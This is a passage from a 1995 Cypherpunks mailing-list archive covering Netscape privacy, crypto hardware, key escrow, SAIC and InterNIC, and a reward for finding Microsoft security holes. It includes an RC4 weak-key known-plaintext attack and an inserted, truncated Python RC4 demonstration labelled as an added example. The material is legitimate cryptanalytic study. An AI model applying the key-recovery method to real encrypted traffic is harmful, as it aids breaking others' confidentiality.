> Cylink has consistently overestimated the strength of its legal > position and has refused all reasonable offers. According to the settlement, RSA made only one offer, which Cylink refused. (Which was all that RSA was obligated to do.) > Cylink now finds itself in the unenviable position of trying > to sell its security products without RSA technology - which > is the de facto industry standard. No amount of "spin > doctoring" in press releases by Cylink changes that fact. Maybe not, but it looks like RSA has their own spin doctors working on it as well. From jonm at netscape.com Thu Sep 28 18:39:34 1995 From: jonm at netscape.com (Jon Mittelhauser) Date: Thu, 28 Sep 95 18:39:34 PDT Subject: Netscape and privacy In-Reply-To: <9509290026.AA08282@toad.com> Message-ID: <44fin4$rdq@tera.mcom.com> csmyth at blaze.cs.jhu.edu (Chris Smyth) wrote: >I personally oppose the collection of this type of behavioral tracking >information without my explicit consent, and I would reconsider using >software which implements the type of tracking Clark mentions above. Note, >Clark's reply is ambiguous because it does not indicate if the `schemes' >have been implemented or deployed at this time. Some list member associated >with Netscape may wish to clarify Clark's comments. > >It is true that a user automatically contacts the Netscape Web site when >starting the browser if he or she has not reset the default home page. I >reset my home page long ago, but I do not know if the Netscape site is still >contacted anyway. Nor do I know if Netscape is contacted when I quit the >browser, or if elapsed usage time is tracked. The Navigator doesn't make any special connections nor perform any data collection on the client-side. In fact, most of the engineers here would quit long before we would provide information without consent.
That was the reason for removing the mail address from the HTTP header years ago...it is very easy to track what the Navigator sends out by simply setting up a proxy/firewall...

Netscape (the company) does attempt to track users through their contacts with our homepage...Needless to say, this is a common practice. We track hits, IP addresses, and attempt to use cookies to determine unique users...We sell advertising based on estimates of hits/etc...if you never hit our site, you are never counted... even if you do hit our site, no information (other than IP address) is ever known...

-Jon

From jim at acm.org Thu Sep 28 18:43:51 1995
From: jim at acm.org (Jim Gillogly)
Date: Thu, 28 Sep 95 18:43:51 PDT
Subject: worldwide announce: New OTP Mail/FTP apps
In-Reply-To: <199509290031.TAA24720@lab21.eng.auburn.edu>
Message-ID: <199509290143.SAA19419@mycroft.rand.org>

> Doug Hughes writes:
> you are really worried about security. This initial transaction serves
> as a seed for subsequent transactions. All subsequent transactions
> depend on preceding transactions. A degree of randomness comes from the
> randomness of the messages. Each next word in the message is random.
> After the initial exchange every message sent subsequently gets randomized
> from the previous randomness of the messages plus something in the table.

OK, you expected this, but here goes anyway. This isn't a one time pad because the "randomness" isn't really random -- it depends on a bunch of plaintext. Technically from your description this looks like a plaintext autokey system. A true OTP requires honest to goodness physically random key material for the pad. It may be quite strong, but it just doesn't fit the definition.

Sigh. People keep throwing OTP around because it's the only known perfect system -- until we get quantum crypto, I suppose -- but few companies actually want to go to the trouble to implement the real thing.
And with good reason -- it's a nuisance to do secure exchanges on the keying material.

Jim Gillogly
Sterday, 8 Winterfilth S.R. 1995, 01:41

From tcmay at got.net Thu Sep 28 19:33:21 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 28 Sep 95 19:33:21 PDT
Subject: Crypto hardware (was: Using sound cards to accelerate RSA?)
Message-ID:

At 1:49 AM 9/29/95, Douglas Barnes wrote:
>[Tim May writes about why crypto h/w acceleration using DSPs,
>and DSPs in general, are likely doomed niche markets.]
>
>I pretty much agree with Tim, except it's important to realize
>that for a _server_ that is doing a lot of RSA operations, the
>difference between a 3.2 second encryption and a 1.9 second
>encryption is significant. Peak transaction volume for any
>public key-based payment system is going to be a factor of how many
>RSA ops you can do per second.

I don't disagree with Doug about this. But I don't think there are many "server" systems running a lot of RSA at this point...for most of us, the amount of RSA (or PGP, IDEA, DES, etc.) computation is a tiny fraction of the total computons consumed running screen savers.

I'm just not convinced I'll soon invest in a company offering RSA acceleration. (I recall seeing articles about specialized modular exponentiation hardware in 1988, and Cylink was offering several such chips. I've yet to see any commercial boards, for reasonable prices. And I'm willing to bet that no more than 3 members of our list would buy such a board, even if the hooks were in place to let PGP, RSAREF, etc. use it. Just a hunch.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
From samman-ben at CS.YALE.EDU Thu Sep 28 19:40:22 1995
From: samman-ben at CS.YALE.EDU (Rev. Ben)
Date: Thu, 28 Sep 95 19:40:22 PDT
Subject: GSSAPI compliant Apps
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I'm interested in writing a GSSAPI compliant app, but I have been so far unsuccessful in finding an example of GSSAPI compliant code to use as a baseline.

Does anyone have any pointers?

Thanks
Ben.

From jsw at neon.netscape.com Thu Sep 28 19:55:06 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Thu, 28 Sep 95 19:55:06 PDT
Subject: Netscape and privacy
In-Reply-To: <9509290026.AA08282@toad.com>
Message-ID: <44fn4k$s4t@tera.mcom.com>

In article <9509290026.AA08282 at toad.com>, csmyth at blaze.cs.jhu.edu (Chris Smyth) writes:
> It is true that a user automatically contacts the Netscape Web site when
> starting the browser if he or she has not reset the default home page. I
> reset my home page long ago, but I do not know if the Netscape site is still
> contacted anyway. Nor do I know if Netscape is contacted when I quit the
> browser, or if elapsed usage time is tracked.

We are counting unique installations of netscape. We have no way of mapping that information to a user name. We don't save any information about you when you contact our web site. The Navigator doesn't make connections to our site behind your back.

> The future Clark posits for his corporation depends on people adopting
> Netscape software for a wide variety of tasks. He wants the browser to
> evolve toward being a general multimedia web browser, mail handler,
> newsreader, and collaboration tool.
> Such a tool would handle large amounts
> of private and/or proprietary information and the creator of such a tool
> must be extremely sensitive to privacy concerns in my opinion. Collecting
> and relaying information about usage is potentially a significant violation
> of the privacy users will expect.

We are very sensitive to privacy concerns. A bunch of folks now working here revolted against an effort to track keystrokes and mouse clicks in Mosaic while they were at NCSA. One of those folks was marca himself.

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From warlord at MIT.EDU Thu Sep 28 20:06:05 1995
From: warlord at MIT.EDU (Derek Atkins)
Date: Thu, 28 Sep 95 20:06:05 PDT
Subject: GSSAPI compliant Apps
In-Reply-To:
Message-ID: <199509290305.XAA25007@toxicwaste.media.mit.edu>

Grab the Kerberos V distribution from MIT; it has a GSSAPI implementation and a sample client/server that use it. I believe you can find it on:

ftp://athena-dist.mit.edu/pub/ATHENA/kerberos

-derek

> I'm interested in writing a GSSAPI compliant app, but I have been so far
> unsuccessful in finding an example of GSSAPI compliant code to use as a
> baseline.
>
> Does anyone have any pointers?

From perry at piermont.com Thu Sep 28 20:54:50 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 28 Sep 95 20:54:50 PDT
Subject: Crypto hardware (was: Using sound cards to accelerate RSA?)
In-Reply-To:
Message-ID: <199509290354.XAA21646@frankenstein.piermont.com>

Timothy C. May writes:
> At 1:49 AM 9/29/95, Douglas Barnes wrote:
> >[Tim May writes about why crypto h/w acceleration using DSPs,
> >and DSPs in general, are likely doomed niche markets.]
> >
> >I pretty much agree with Tim, except it's important to realize
> >that for a _server_ that is doing a lot of RSA operations, the
> >difference between a 3.2 second encryption and a 1.9 second
> >encryption is significant.
>
> I don't disagree with Doug about this. But I don't think there are many
> "server" systems running a lot of RSA at this point. [...]
> for most of us, the
> amount of RSA (or PGP, IDEA, DES, etc.) computation is a tiny fraction of
> the total computons consumed running screen savers.

And if problems like this don't get solved, how do you expect digital online banking to be done? Psychic quantum transfers between the machines? What do you think a bank in the future is, if not a server that has to do lots and lots of RSA or D-H or what have you?

Sorry for being nasty, Tim. It's just that some of us live in the real world, have real clients, and actually worry about this as a problem. This *is* a legitimate problem. Consider what the load on a web site using D-H key exchange for every connection gets like when you have millions of people hitting it every day.

> (I recall seeing articles about specialized modular exponentiation hardware
> in 1988, and Cylink was offering several such chips. I've yet to see any
> commercial boards, for reasonable prices. And I'm willing to bet that no
> more than 3 members of our list would buy such a board, even if the hooks
> were in place to let PGP, RSAREF, etc. use it. Just a hunch.)

You obviously haven't heard of Fortezza cards. Yup, they are key escrowed -- but they do in fact do public key operations on board. There are a lot of them floating around. The reason the market for this is weird is the same reason Sun took the DES chips off its motherboards years ago -- you can't conduct modern business with the fucked up export regime we are dealing with.

.pm

From abc at gateway.com Thu Sep 28 20:58:54 1995
From: abc at gateway.com (Alan B. Clegg)
Date: Thu, 28 Sep 95 20:58:54 PDT
Subject: awards for hacking microsoft
In-Reply-To: <9509282225.AA04018@ch1d157nwk>
Message-ID:

On Thu, 28 Sep 1995, Andrew Loewenstern wrote:
> > What else, Chaum's Digicash. If you are unwilling to part with
> > any of your own, perhaps you can collect contributions, or maybe
> > the Digicash people will pony-up some extra cyberbucks for a good
> > cause. After all, they are worth the paper they're printed on.
> > :-)
>
> Don't tell that to the people on the ECM mailing list! People there have
> been trading cyberbucks for RealMoney. The last successful trade I saw was
> 100 cyberbucks for 4 UK pounds...

And to add to the exchange, I'm offering a US$50 [real] discount for any client of Gateway Communications that deposits $5 [cyber] via my web page. The reduction hurts me very little, and the exchange of cyberbucks is fun. Isn't that why we do this stuff anyway?

-abc

It's time to stand and cry | Alan B Clegg
That Freedom will not live | President
Beyond our willingness to die | Gateway Communications
-Lester Bork | http://www.gateway.com

From nobody at REPLAY.COM Thu Sep 28 21:39:53 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 28 Sep 95 21:39:53 PDT
Subject: No Subject
Message-ID: <199509290439.FAA26254@utopia.hacktic.nl>

Subject: Re: 25 Crays a Year to Break STT

> Although no encryption system was totally secure, Mr Dent
> estimated it would take "25 Cray supercomputers a year" to
> break the STT codes.

Is it just me, or does someone need to be humbled?

STTbruter anyone?

From carolann at censored.org Thu Sep 28 22:02:32 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Thu, 28 Sep 95 22:02:32 PDT
Subject: 53 of the FAX No's. are GOOD!
Message-ID: <199509290502.WAA29977@usr1.primenet.com>

-----BEGIN PGP SIGNED MESSAGE-----

53 of the Fax numbers were good. About 15 were no good, and the rest turned in no answers.
I will update this URL tomorrow, when I can completely check the list; http://www.c2.org/~carolann/enda001.html is where the list is at on the WWW.

Love Always,
Carol Anne

--
Member Internet Society - Certified BETSI Programmer - Webmistress
***********************************************************************
Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96
My Homepage The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
http://dcs.ex.ac.uk/~aba/export/

From sameer at c2.org Thu Sep 28 23:04:10 1995
From: sameer at c2.org (sameer)
Date: Thu, 28 Sep 95 23:04:10 PDT
Subject: Ray Cromwell: Another Netscape Bug (and possible security (fwd)
Message-ID: <199509290559.WAA24563@infinity.c2.org>

Forwarded message:

From mark at lochard.com.au Thu Sep 28 23:32:30 1995
From: mark at lochard.com.au (Mark)
Date: Thu, 28 Sep 95 23:32:30 PDT
Subject: "Notes" to be Eclipsed by "Netscape"
In-Reply-To:
Message-ID: <199509290423.AA52917@junkers.lochard.com.au>

>person for Hewlett-Packard (about the HP internal net with 19
>worldwide connections to the Internet - by the way, allegedly
>no one has ever succeeded in breaking their firewalls)

I am unable to discuss the details of this (so don't ask), but HP's firewall was breached way back in the early 90's. The breach was not discovered, more upgraded over, so I am unsure as to whether it is still open. Blanket statements such as company X or firewall Y not being breached are almost always false.
One anecdote: a domain installed a firewall but didn't bother to examine their internal hosts' security. This was a mistake because a number of hosts were *already* trojaned so an outsider could trigger the mechanisms to allow entry seamlessly through the firewall. This is a good argument for keeping OS versions current.

Have a nice day.

Mark
mark at lochard.com.au
The above opinions are rumoured to be mine.

From stewarts at ix.netcom.com Thu Sep 28 23:59:51 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Thu, 28 Sep 95 23:59:51 PDT
Subject: [NOISE] Re: SAIC bought InterNic, but who is SAIC? A spook contractor!
Message-ID: <199509290659.XAA09160@ix7.ix.netcom.com>

>SAIC's board members include Admiral Bobby Inman, former NSA head and deputy
>director of the CIA; Melvin Laird, Nixon's defense secretary; and retired
>General Max Thurman, commander of the Panama Invasion. Recently departed
>board members include Robert Gates, former CIA director; William Perry,
>current Secretary of Defense; and John Deutch, the current CIA director.
...
>"At the very time the Internet community is struggling with the issues of
>encryption and privacy, I'm more than a little uneasy to find this bunch of
>ex-spooks sitting at the very entry point of the Net," says Jim Warren (a

Yeah, that _is_ a pretty spooky bunch; I don't know if anybody'd have standing to do a conflict-of-interest or governmental ethics case of any sort, since it is more or less a monopoly?

[BEGIN NOISE]
On the other hand, I suppose I'd rather have the CIA making money by selling directory services than, say, dealing cocaine or collecting graft from third-world governments :-)
[END NOISE]

>Current SAIC government contracts include re-engineering information systems
>at the Pentagon, automation of the FBI's computerized fingerprint
>identification system, and building a national criminal history information
>system.
SAIC's a fairly generalized contracting firm, specializing in study contracts and other front-end work rather than back-end implementation grunt-work; I'm not surprised by the list.

#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From stewarts at ix.netcom.com Fri Sep 29 00:00:30 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 29 Sep 95 00:00:30 PDT
Subject: Netscape & Fortezza (Or, say it Ain't so, Jeff?)
Message-ID: <199509290659.XAA09185@ix7.ix.netcom.com>

>I for one am against any kind of GAK on moral grounds. I also think
>that trying to implement mandatory GAK in a software only system
>would be a nightmare.

Unfortunately, it's quite simple, if your only intent is to get the keys, and not to use it as a way to increase NSA leverage... Carl Ellison's web page points out the simple version of this, and it's easy to extend to make it more reliable.

1) Have the NSA/NIST/DEA/etc. generate public keys for their GAK agents.
2) Have each session-key-transfer encrypt a copy of the session key with the public key of the GAK agent, and send it at the beginning of the connection.
3) To make it more robust, have the recipient of the session key also encrypt the session key with the GAK key and send it back, so that a conformist receiver can rat the key even if the sender didn't. (takes a little protocol support to make sure the sender doesn't mind getting it echoed back to her.)

Unlike Steven Walker's fancy complex method (which Dorothy liked a lot), this is simple and straightforward, and requires no validation by the recipient. (Both parties could send fakes, but they could do that anyway.) What it doesn't do is allow third parties to detect whether the GAK field has the real session key in it or a fake, but c'est la guerre.
You can even get fancier and support M-of-N splitting, requiring M of N GAK agents to give out their keyparts; just do the split and encrypt each piece with the corresponding GAK agent's public key. This also works in a wide variety of environments (e.g. Diffie-Hellman). You could also scrounge a few bits by using the GAK field as an IV if you need one.

#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From nelson at santafe.edu Fri Sep 29 00:13:24 1995
From: nelson at santafe.edu (Nelson Minar)
Date: Fri, 29 Sep 95 00:13:24 PDT
Subject: No Subject
In-Reply-To: <199509290439.FAA26254@utopia.hacktic.nl>
Message-ID: <9509290711.AA07934@sfi.santafe.edu>

>>Although no encryption system was totally secure, Mr Dent estimated
>>it would take "25 Cray supercomputers a year" to break the STT codes.
>Is it just me, or does someone need to be humbled?

They're certainly calling out for some external evaluation.

Has anyone read the specs? Care to summarize? I'm curious if the "25 crays one year" comment is intended to mean anything, or if it's just some foolish PR person who doesn't understand what he's talking about.

From sameer at c2.org Fri Sep 29 00:27:10 1995
From: sameer at c2.org (sameer)
Date: Fri, 29 Sep 95 00:27:10 PDT
Subject: your mail
In-Reply-To: <9509290711.AA07934@sfi.santafe.edu>
Message-ID: <199509290722.AAA01028@infinity.c2.org>

As if the ITAR would allow something like that to be exported? As if microsoft would actually produce a product which the ITAR wouldn't allow to export? Sounds like PR bullshit. Compared to this Netscape's PR looks -good-.

Stay tuned for Hack Microsoft. Community ConneXion gets into the T-shirt biz. ;-)

>
> >>Although no encryption system was totally secure, Mr Dent estimated
> >>it would take "25 Cray supercomputers a year" to break the STT codes.
> >Is it just me, or does someone need to be humbled?
>
> They're certainly calling out for some external evaluation.
>
> Has anyone read the specs? Care to summarize? I'm curious if the "25
> crays one year" comment is intended to mean anything, or if it's just
> some foolish PR person who doesn't understand what he's talking about.
>

--
sameer Voice: 510-601-9777
Community ConneXion FAX: 510-601-9734
An Internet Privacy Provider Dialin: 510-658-6376
http://www.c2.org (or login as "guest") sameer at c2.org

From sameer at c2.org Fri Sep 29 01:07:40 1995
From: sameer at c2.org (sameer)
Date: Fri, 29 Sep 95 01:07:40 PDT
Subject: Cypherpunks Fax Service
Message-ID: <199509290802.BAA03251@infinity.c2.org>

I see a potential business opportunity for enterprising cypherpunks:

People have been posting things saying "we should have press releases". People have been posting useful information regarding fax numbers of reporters around the country and such. In this I see a potential low-maintenance business opportunity for some enterprising cypherpunk with a high-grade fax machine.

There is no way anyone can make a 'Cypherpunk press release' because there is no "Cypherpunk Organization". There -are- however, cypherpunks organizations. Community ConneXion is one, for example, and others such as COMSEC partners may be considered cypherpunk organizations.

Some enterprising cypherpunk may wish to sell the services of their fax machine so that cypherpunk organizations don't need to invest the time towards building up a good database of press fax numbers. For some fee a cypherpunk organization would send only to the service a press release, and the service would make sure it reaches all the people in the press who find cypherpunk topics interesting.

Hell, if no one sets this up before I get my own mass-faxer setup, I might just do it myself.
--
sameer Voice: 510-601-9777
Community ConneXion FAX: 510-601-9734
An Internet Privacy Provider Dialin: 510-658-6376
http://www.c2.org (or login as "guest") sameer at c2.org

From craig at passport.ca Fri Sep 29 01:33:10 1995
From: craig at passport.ca (Craig Hubley)
Date: Fri, 29 Sep 95 01:33:10 PDT
Subject: SpokesPunking...
In-Reply-To:
Message-ID:

> At 3:03 AM 9/26/95, Craig Hubley wrote:
> >"Consensus on cypherpunks seems to be that 40 bit encryption is not viable
> > for commercial applications, and that Netscape seems to have taken less
> > than due care to choose an appropriate random seed for its session keys."
>
> No offense offered Craig, 'cause I like reading your stuff here, but the
> consensus opinion on cypherpunks is "We don' need no steeenking
> spokespunk!".

Does this read like spokespunking? I kind of read it more like journalism. Then again, the role of a temporary mouthpiece, if claimed by anyone, will lead to a series of flame attacks no matter what they say, even if correct and reasonable. And we don't need more of those! So no spokespunking! How about standardizing on: "It seems to me that..." and if someone wants to refer to his impression of what 'other' punks think, then so be it.

>It seems to me that you can say that without any title, and
> the mouthier amongst us will be tapped for quotes as individuals anyway...

As I was today. Banking technology or some such trade rag. Stay tuned for the editor's guaranteed-outrageous misquotes. I was careful not to say anything that might be construed as a quasi-official 'punk' position. I made the point that the hacking of secure systems, when done in the open, and without intent to grab private information, was a legitimate activity in the computer security community, which included the cypherpunks as one of several interested sub-communities. And that Netscape saw it that way too, having acknowledged that they had 'learned a lot', etc.

So... Flame me!
--
Craig Hubley Business that runs on knowledge
Craig Hubley & Associates needs software that runs on the net
mailto:craig at hubley.com 416-778-6136 416-778-1965 FAX
Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5

From craig at passport.ca Fri Sep 29 01:36:57 1995
From: craig at passport.ca (Craig Hubley)
Date: Fri, 29 Sep 95 01:36:57 PDT
Subject: cypherpunk press releases vs. FAQ
In-Reply-To: <199509262141.OAA24578@netcom8.netcom.com>
Message-ID:

I favor a FAQ, but only if each individual answer is attributed to a specific person and others can answer the same question with possibly a contradictory answer (but may not refer to the others' answer, that just makes it quoting and flaming). Perhaps organized as a hypertext. Everyone has an HTML browser now, right?

--
Craig Hubley Business that runs on knowledge
Craig Hubley & Associates needs software that runs on the net
mailto:craig at hubley.com 416-778-6136 416-778-1965 FAX
Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5

From sameer at c2.org Fri Sep 29 01:46:32 1995
From: sameer at c2.org (sameer)
Date: Fri, 29 Sep 95 01:46:32 PDT
Subject: COMMUNITY CONNEXION TO OFFER REWARD FOR HACKING MICROSOFT
Message-ID: <199509290841.BAA05624@infinity.c2.org>

For Immediate Release
Contact: Sameer Parekh 510-601-9777 (Pager: 510-321-1014)

COMMUNITY CONNEXION TO OFFER REWARD FOR HACKING MICROSOFT

Sept. 29 1995 - Community ConneXion, an Internet Privacy Provider in Berkeley, CA, announced today that it will be providing awards to people who find and publicize security holes in Microsoft products. "Microsoft claims to be promoting secure transactions on the net," said Sameer Parekh, founder of Community ConneXion, "We will prove them wrong."

Microsoft has been quoted making disparaging comments about their competitor Netscape's product, Netscape Navigator. Community ConneXion has also been offering a reward to expose holes in Netscape's products. "We target widely used programs," said Parekh.
Parekh expects that many bugs and flaws in Microsoft's security software will be found.

People want to use the Internet to do business. They want to be able to buy things, manage their finances, and communicate privately from the comfort of their home computer. Without a secure infrastructure none of this is possible.

Information about the Hack Microsoft promotion is available from http://www.c2.org/hackmsoft/. People who have found security holes and have written exploits are directed to send mail to hackmsoft at c2.org.

Community ConneXion is the premier provider of privacy on the Internet. They provide anonymous email accounts and support the anonymous remailer infrastructure. Information is available from http://www.c2.org/ or info at c2.org.

Microsoft is a trademark of Microsoft Corp. Netscape and Netscape Navigator are trademarks of Netscape Communications Corp. This promotion is not affiliated with Microsoft or Netscape.

From fc at all.net Fri Sep 29 02:58:24 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Fri, 29 Sep 95 02:58:24 PDT
Subject: SAIC bought InterNic, but who is SAIC? A spook contractor!
In-Reply-To: <9509290018.AA08111@toad.com>
Message-ID: <9509290956.AA14949@all.net>

> From: Wes Thomas
>
> The press recently reported that the National Science Foundation has turned
> over Internet Domain Name registration to Network Solutions, Inc. (NSI) of
> Herndon, VA. The press failed to note some interesting connections.
>
> Tomorrow morning (Sept. 26), Web Review, a biweekly online magazine (see
> Special Report at http://gnn.com/wr/) will reveal that NSI was purchased in
> May by Scientific Applications International Corporation (SAIC) of San

That's Science Applications ... An employee owned systems integrator. They are one of the largest systems integrators in the world, 2nd largest to the US government (last time I looked).

> Diego. SAIC is a $2 billion company indicted by the Justice Department on
> ten felony counts for fraud in managing a Superfund toxic cleanup site (SAIC
> pleaded guilty) and sued by the Justice Department for civil fraud on an
> F-15 fighter contract.

Interesting summary, but you forgot to note that what really happened was that SAIC made some bookkeeping errors, noticed them in a self-audit, and reported themselves to the government. Unlike some companies that try to cover these things up, SAIC found the problems themselves and didn't cover them up.

> SAIC's board members include Admiral Bobby Inman, former NSA head and deputy
> director of the CIA; Melvin Laird, Nixon's defense secretary; and retired
> General Max Thurman, commander of the Panama Invasion. Recently departed
> board members include Robert Gates, former CIA director; William Perry,
> current Secretary of Defense; and John Deutch, the current CIA director.
> Current SAIC government contracts include re-engineering information systems
> at the Pentagon, automation of the FBI's computerized fingerprint
> identification system, and building a national criminal history information
> system.

SAIC is also one of the largest companies in the information security field, with over 500 active info-sec contracts at any given time. They work for industry as well as government in info-sec, systems integration, and outsourcing. For example, they currently do all of the IT work for BP, handle info-sec for several banks and Wall Street firms, have contracts with some of the large players in the entertainment business, and sponsored the last America's Cup entry from the US.
> "At the very time the Internet community is struggling with the issues of
> encryption and privacy, I'm more than a little uneasy to find this bunch of
> ex-spooks sitting at the very entry point of the Net," says Jim Warren (a
> leading activist in making government records accessible) in the article,
> which was written by investigative journalist Stephen Pizzo, Web Review
> Senior Editor and co-author of the book Inside Job, an expose on the savings
> & loan looting.

The real ex-spooks aren't that heavily embedded in SAIC. The company was started by a well known physicist who is still the CEO and chairman, and they do a lot of research in preserving the environment, undersea research, business reengineering, and other things that are not spookish.

Just thought I would present the rest of the story. By the way, I have been a consultant for them from time to time, and I have found them to be hard working, intelligent, and highly motivated. They do indeed have a lot of very intelligent people working for them, many of whom used to work in high-level positions for both Democratic and Republican administrations, but I don't think you should hold that against them - after all, if you were a major government contractor, wouldn't you want to get people who know how the government works?

--
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

From AndrewR at beetle.vironix.co.za Fri Sep 29 04:02:31 1995
From: AndrewR at beetle.vironix.co.za (Andrew Roos)
Date: Fri, 29 Sep 95 04:02:31 PDT
Subject: Cryptanalysis of RC4 - Preliminary Results (Repeat)
Message-ID: <306BD292@beetle.vironix.co.za>

(This is a repeat because I posted the original 36 hours ago and it still hasn't bounced back to me.)

-----BEGIN PGP SIGNED MESSAGE-----

Hi c'punks & sci.cryptites

About a week ago I posted a message about weak keys in RC4.
This is an update on the results of my continued 4am sessions with RC4 and shows that certain weak keys lead to an almost-feasible known plaintext attack on the cipher (well, about as feasible as the differential attack on DES, shall we say).

The attack is based on two particularly interesting three-byte key prefixes which have a high probability of producing PRNG sequences which start with a known two-byte sequence. The prefixes are:

1. Keys starting with "00 00 FD" which have a 14% probability of generating sequences which start "00 00".

2. Keys starting with "03 FD FC" which have a 5% probability of generating sequences which start "FF 03".

Note that the expected frequency of any two-byte output sequence is 1 in 65536 or about 0.0015%, so these key prefixes are highly unusual. I won't go into the reasons why in this post, since it follows the same reasoning as my last post, but these prefixes are special in that they have a high probability of initializing the RC4 state table in such a way that the first two generated bytes depend only on the first three entries in the state table.

This observation is the basis for a simple known-plaintext attack which reduces the effective key space which you need to search to have a 50% probability of discovering a key by about 11.2 bits. The down side is that you need "quite a few" known plaintexts to make the attack feasible. It works as follows:

1. Collect a large number of known plaintexts (and hence known generator sequences).

2. Discard generator sequences which do not start with "00 00" or "FF 03".

3. For generator streams starting "00 00", search all keys which begin with "00 00 FD".

4. For generator streams starting "FF 03", search all keys which begin with "03 FD FC".

5. Keep going until you find a key :-)

Clearly this attack will only discover a small fraction of the keys.
However since most generator sequences are discarded without being searched, and for those which are searched the search is 2^24 smaller than would be required to search the entire keyspace, the number of trials required to determine a key is significantly lower than for brute force alone.

Enough of an intro, here are the relevant results. Forgive my simplistic approach to maths, I'm a philosopher-cum-software developer, not a mathematician.

I've run the relevant simulations with 40-bit, 64-bit, 80-bit and 128-bit key lengths, and with two different PRNGs. For the sake of consistency with my earlier paper I'll use the figures gathered for 80-bit keys (this seems to be RSA's preferred key length for RC4), but there are no significant differences for other key lengths. The PRNG used for these tests was L'Ecuyer's 32-bit combined linear congruential generator as described in "Applied Cryptography" p. 349.

(a) Out of one million trials, keys starting with "00 00 FD" generated sequences starting "00 00" 138217 times, and keys starting with "03 FD FC" generated output sequences starting "FF 03" 50490 times.

(b) Out of ten million trials, arbitrary pseudo-random keys generated sequences starting with "00 00" 446 times, and sequences starting with "FF 03" 146 times. (Note the abnormally high incidence of "00 00"; the expected mean is 152.8).

Suppose we have the output stream generated by a randomly chosen key. The chance that it will start with either "00 00" or "FF 03", and that we will therefore search it, is:

    (446 + 146) / 1e7 = 5.92e-5

The chance that it starts with "00 00" and was generated by a key starting with "00 00 FD", or that it starts with "FF 03" and was generated by a key starting "03 FD FC" - i.e.
the chance that we will search it and be rewarded for our efforts - is:

    (138217 + 50490)/(1e6 * 2^24) = 1.12e-8

The total number of plaintexts required for a 50% chance that we will discover one of the keys is:

    log(0.5)/log(1 - 1.12e-8) = 61 900 000

Well I did say "quite a few" plaintexts would be necessary :-)

And the number of plaintexts which you expect to search in order to find the "right" one is:

    61 900 000 * 5.92e-5 = 3665

Since the total key length is 80 bits, and we are "guessing" 24 of these, each search requires 2^56 trials. Hence the total number of trials for a 50% chance of discovering a key is:

    3665 * 2^56 = 2.64e20 = 2 ^ 67.8

Since brute search alone would require 2^79 trials for a 50% chance of determining the key, this reduces the number of trials by 2^11.2.

The results are essentially identical for all the key lengths I have tried, and in each case reduce effective key length by about 11.2 bits. So, for example, a 64-bit key would normally require 2^63 trials for 50% chance of solution; this attack reduces the number of trials to 2^51.8 at the cost of requiring 62 million known plaintexts.

I'm still running simulations to check my maths, and although initial results are encouraging, I don't have enough data for it to be statistically relevant yet (generating all these sets of 62 million known streams takes time...) So consider this preliminary (again), and I'll post the results of my simulations when I have enough data.
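The prefix behaviour described in the post, as an added example that is not part of Andrew Roos's message or his simulation code: a standard RC4 (KSA/PRGA, checked against a published test vector) that derives the two keystream bytes each prefix pins from the partial key schedule, then estimates the hit rate over 80-bit keys whose remaining bytes are random. The trial counts, the seeded PRNG and the (1 - n/256)^253 model of the figures are assumptions made for this example.

```python
"""RC4 weak-key-prefix demonstration (added example, not code from the post).

Standard RC4 key scheduling (KSA) and output generation (PRGA), used to show
(1) why the two prefixes from the post pin the first two keystream bytes and
(2) how often that prediction holds when the rest of an 80-bit key is random.
Trial counts and the seeded PRNG are choices made for this example.
"""
import random


def rc4_ksa(key: bytes, rounds: int = 256) -> list:
    """Permute S = [0..255] under control of the key.

    rounds < 256 stops the schedule early, which exposes the state that the
    first few key bytes alone have fixed (the post's observation)."""
    s = list(range(256))
    j = 0
    for i in range(rounds):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    return s


def rc4_prga(s: list, n: int) -> bytes:
    """Generate n keystream bytes from state s (s is modified in place)."""
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)


def rc4_keystream(key: bytes, n: int) -> bytes:
    """First n keystream bytes for a full (256-round) key schedule."""
    return rc4_prga(rc4_ksa(key), n)


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt (same operation) by XOR with the keystream."""
    return bytes(a ^ b for a, b in zip(data, rc4_keystream(key, len(data))))


# The two prefixes from the post and the two-byte output each one favours.
WEAK_PREFIXES = {
    bytes.fromhex("0000FD"): bytes.fromhex("0000"),
    bytes.fromhex("03FDFC"): bytes.fromhex("FF03"),
}
ZERO2 = bytes.fromhex("0000")


def predicted_first_two(prefix: bytes) -> bytes:
    """The first two PRGA bytes if the KSA rounds after the prefix leave the
    entries the prefix touched alone, i.e. the output the post predicts."""
    s = rc4_ksa(prefix, rounds=len(prefix))  # only the prefix's own rounds
    return rc4_prga(s, 2)


def fraction_with_prefix(prefix: bytes, first_out: bytes, trials: int,
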